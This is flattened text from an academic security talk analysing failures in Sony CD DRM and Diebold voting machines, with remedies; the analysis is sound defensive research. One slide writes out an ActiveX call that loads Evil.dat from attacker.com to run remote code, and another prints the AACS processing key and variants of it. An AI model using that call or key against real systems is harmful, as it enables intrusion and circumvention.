lessons from security failures in nontraditional computing environments

Lessons from Security Failures In Nontraditional Computing Environments

J. Alex Halderman

J. Alex Halderman 2

CD DRM2003, 2005

SDMI2001

CSS1999

AACS2007

Diebold2003, 2006

What’s the common “thread”?

J. Alex Halderman 3

Nontraditional Environments

ProblemPlatform Package

J. Alex Halderman 4

Security IntuitionSecurity Intuition Breakdown

Underestimate SimilarityUnderestimate DifferenceUnderestimate Risk

J. Alex Halderman 5

Spectacular Failures

CascadingIrreparableCollateral damage

J. Alex Halderman 6

NontraditionalEnvironments

IntuitionBreakdowns

SpectacularFailures

J. Alex Halderman 7

Disaster Investigation

J. Alex Halderman 8

Questions What about these environments

makes failures especially severe? Are there patterns to the design and

implementation mistakes behind them?

Where are such failures likely to occur in the future?

What tools and techniques can we use to prevent them?

J. Alex Halderman 9

Outline

1. A Model for Security Failures2. Failures in CD-DRM Systems3. Failures in E-Voting Systems4. Predicting Future Disasters5. Remedies and Defensive

Strategies

J. Alex Halderman 10

CD DRM

2001 1st Generation: Passive protection

2003 2nd Generation: Active protection

2005 3rd Generation: Weak passive + Aggressive

active

[H02]

[H03]

[HF05]


Nontraditional Problem

Restrict use(Untrusted device)

Compatibility(Legacy format)

All DRM: No known solution providestraditional security guarantees


Nontraditional Package

Drivers

Ripper/copier Application

Protection driver

Normal CD

OSProtection driver

Autorun

#

CD Marked

“Protected”

Audio CDHybrid

CD


A Spectacular Failure

Failure in depthInstaller → Patch → Uninstaller

Mass exposureMillions of computers vulnerable

Difficult repairsMost users unaware they’re at risk

High costsLawsuits, recalls, lost sales


SunnComm

“Light years beyond encryption™”52 titles

4.7 million discs37 titles

20 million discs

First4Internet


Rootkit

Magic prefix: $sys$

FilesProcessesRegistry keys

Hidden

DRM challenge: Users will remove protection driverVendor response: Install a rootkit to hide it

[HF06]


Rootkit

Exploits in wild Backdoor.Ryknos.B

Trojan.Welomoch

DRM challenge: Users will remove protection driverVendor response: Install a rootkit to hide it

Attack: Privilege escalationMistake: Hides arbitrary objects

$sys$virus.exe

[HF06]


InstallerDRM challenge: Users will decline to install softwareVendor response: Install regardless of consent

Attack: Privilege escalationMistake: Incorrect permissions

M

13+ MB installed before EULA screen

Everyone:Full Control

Runs with administrator privilegesnext time CD is inserted


InstallerDRM challenge: Users will decline to install softwareVendor response: Install regardless of consent

Attack: Privilege escalationMistake: Incorrect permissions

MSony releases patch…but, patch calls potentially booby trapped code [HF06]

How do users know they need to patch? Vulnerable even if refused installation


UninstallersDRM challenge: Angry customers demand removalVendor response: Offer uninstallers, but limit access

“HTTP GET /XCP.dat”

Web page calls ActiveX controlCodeSupport.Uninstall(“http://www.sony-bmg.com/XCP.dat”)

Serversony-bmg.comXCP.dat

ClientCodeSupport.ocx

Client extracts InstallLite.dll from XCP.dat, calls UnInstall_xcp()

2.

3.

4.

User obtains single-use code for uninstallation web page

1.

[HF06]


Control accepts arbitrary URLRemote code not

authenticatedControl not removed after

use

UninstallersDRM challenge: Angry customers demand removalVendor response: Offer uninstallers, but limit access

Attack: Remote code executionMistakes:

“HTTP GET /XCP.dat”Server

sony-bmg.comXCP.dat

ClientCodeSupport.ocx

Rookie mistakes

Victim visits attacker’s web pageCodeSupport.Uninstall(“http://www.attacker.com/Evil.dat”)

1.

2.

Client executes code from Evil.dat with user’s privileges3.

“HTTP GET /Evil.dat”Server

attacker.comEvil.dat

[HF06]


Environmental EffectsTechnology phase change

Risks appear unexpectedlyDRM problem → inherent conflict

Deliberately subvert control of PCLack of transparency

Problems more difficult to detectConflicting incentives

Choose risky DRM over user securityPolitics


Intuition Breakdown

Nearly all parties underestimated security risks:

Vendors

Sony

Users

Experts

“Most people, I think, don't even know what a Rootkit is, so why should they care about it?”

— Thomas Hesse President, Sony BMG Global Digital

Business

Vendors

Sony

Users

Experts

Destroyed by rookie security mistakes

Didn’t know music CDs could hurt them

Didn’t discover rootkit for six months


Outline


Strategies


Diebold DREs


Nontraditional Package


Nontraditional Platform


Nontraditional Problem

Paperless DREs: No known solutionprovides traditional security guarantees

Voting… Securely Secretly Accessibly Quickly Cheaply


A Spectacular Failure

Failures in depthCode insertion routes, physical

securityMass exposure

Millions of votes at riskDifficult repairs

Some attacks not patchableHigh costs

Many states likely to replace machines


Inserting Code

Bootloader

WinCE Kernel

BallotStation

FBOOT.N

B0

Bootloader

NK.BIN

WinCE Kernel

INSTAL

L.IN

S

BallotStation

(Internal Flash or EPROM)

(Internal Flash)

(Internal Flash)

[FHF07]

EXPL

ORER.G

LB


Inserting Code

WinCE Kernel

BallotStation

Bootloader (Flash)

[FHF07]

Failure in Depth:Boot into ExplorerInsecure firmware

updaterROM replacement


[FHF07]Stealing Votes

WinCE Kernel

BallotStation Stuffer


[FHF07]Stealing Votes

Kernel

BallotStation

Primary Vote Record Backup Vote Record

Audit Log

Primary Vote Record Backup Vote Record

Audit Log

Stuffer


Viral Propagation [FHF07]

Reboot


[FHF07]


Physical Security [FHF07]


Physical SecurityFailure in Depth:

Same key used everywhere

Widely availableSecret disclosed

on web siteLock easy to pick

[FHF07]


Environmental EffectsTechnology phase change

Risks appear unexpectedlyDifficulty of the problem

Confusing threat model, circular reasoning

Lack of transparencyBasic errors persist for yearsSecurity treated as a PR problem

Conflicting incentivesOfficials choose efficiency over security

Politics


Intuition Breakdown

Nearly all parties underestimated security risks:

Vendor

Officials

Experts

Vendor

Officials

Experts

Planned security by obscurityVastly underinvested in security design

Many surprised by severity of problems

Underestimated similarity to PCsDidn’t understand threat model

CAsCAs Lacked institutional competence to see risks


Outline


Strategies


Learning from Failures

My Past WorkCD DRME-Voting

Related WorkPast Voting StudiesCSS, SDMI, HDCP, DTVWEP, GSM, RFID

Work in ProgressAACSOther voting systems

Future Work(Predicted failures)


AACS [Work in progress]

Title Key

Volume Key

Processing Key

Device Key

February 11

February 24

January 13

January 12Title Key

Volume Key

Processing Key

Device Key

Potential disaster (analyze game theory)

Solid crypto, Rookie coding errors

Revokable Arms Race

Interesting lessons on incentives, politics, law

DRM as nontraditional security problem

09 f9 11 02 9d 74 e3 5b d8 41 56 c5 63 56 88 bd09 f9 11 02 9d 74 e3 5b d8 41 56 c5 63 56 88 be09 f9 11 02 9d 74 e3 5b d8 41 56 c5 63 56 88 bf

?09 f9 11 02 9d 74 e3 5b d8 41 56 c5 63 56 88 c109 f9 11 02 9d 74 e3 5b d8 41 56 c5 63 56 88 c209 f9 11 02 9d 74 e3 5b d8 41 56 c5 63 56 88 c3


Other Voting Systems [Work in progress]


Predicting Failures

NontraditionalEnvironment

+Technology

Phase Change

+


Future Failures?


Outline


Strategies


Defensive Approach

New Intuitions New Technologies New Policies


General LessonsSecurity disasters occur where security research isn’t involved

New intuitions, partnerships, transparencyProblems that resist rigorous security analysis are prone to major failures

Research ways to transform problemsFailures have higher externalities where producer and user incentives misalign

Where appropriate, add liability


Remedies: DRM

New intuition DRM as a risk to client security

New policiesMandatory transparency(DMCA reform, installation disclosure)Liability for aggressive, dangerous techniques (change maker incentives)


Remedies: E-Voting

New intuitionsVoting machines and PCs share vulnerabilitiesNo software should be trusted to count votes

New policiesImproved transparency, certification processesLiability for insecurity: fix at vendor’s cost?(change maker incentives)Software independence


New Technologies[CHF07]Machine-assisted auditing

1. Initial count(untrusted)

2. Recount machinecommits to each ballot

Ballot

3. Humans check sample by hand


C := H(…)C := H(…)

New Technologies[HW07]Harvested verifiable challenges

1. Collect fresh data from varied sources

2. Hash data toform “challenge”

3. Anyone can verifychallenge was valid

?


Contributions1. New model for security failures

Analysis of past failures from the literaturePredictions for future failuresPolicy implications

2. Analysis of failures in DRM systemsInherent limitations of CD copy protection[H03,H04] Client security failures from Sony CD DRM[HF06]Coming AACS arms race*

3. Analysis of failures in e-voting systemsDiebold AccuVote TS and TSx[FHF07]AVC Advantage*

4. Technological remediesMachine-assisted election auditing[CHF07]Harvesting verifiable challenges[HW07]Privacy management for mobile devices[HWF05]


ReferencesH03 J. A. Halderman. “Evaluating New Copy-Prevention

Techniques for Audio CDs.” DRM 2002.H04 J. A. Halderman. “Analysis of the MediaMax CD3 Copy-

Prevention System.” 2003.HWF04 J. A. Halderman, B. Waters, and E. Felten. “Privacy

Management for Portable Recording Devices.” WPES 2004.HF06 J. A. Halderman and E. Felten. “Lessons from the Sony CD

DRM Episode.” USENIX Security 2006.FHF07 A. Feldman, J. A. Halderman, and E. Felten. “Security Analysis

of the Diebold AccuVote-TS Voting Machine.” In submission, 2007.

CHF07 J. Calandrino, J. A. Halderman, and E. Felten. “Machine-Assisted Election Auditing.” In submission, 2007.

HW07 J. A. Halderman and B. Waters. “Harvesting Verifiable Challenges from Oblivious Online Sources.” In submission, 2007.

Lessons from Security Failures In Nontraditional Computing Environments

J. Alex Halderman

lessons from security failures in nontraditional computing environments

Documents

alex haldermanj

security dont

security failuresfailures

passive protection

active protection

cd drm2003

cd drm20011stgeneration

cddrm systemsfailures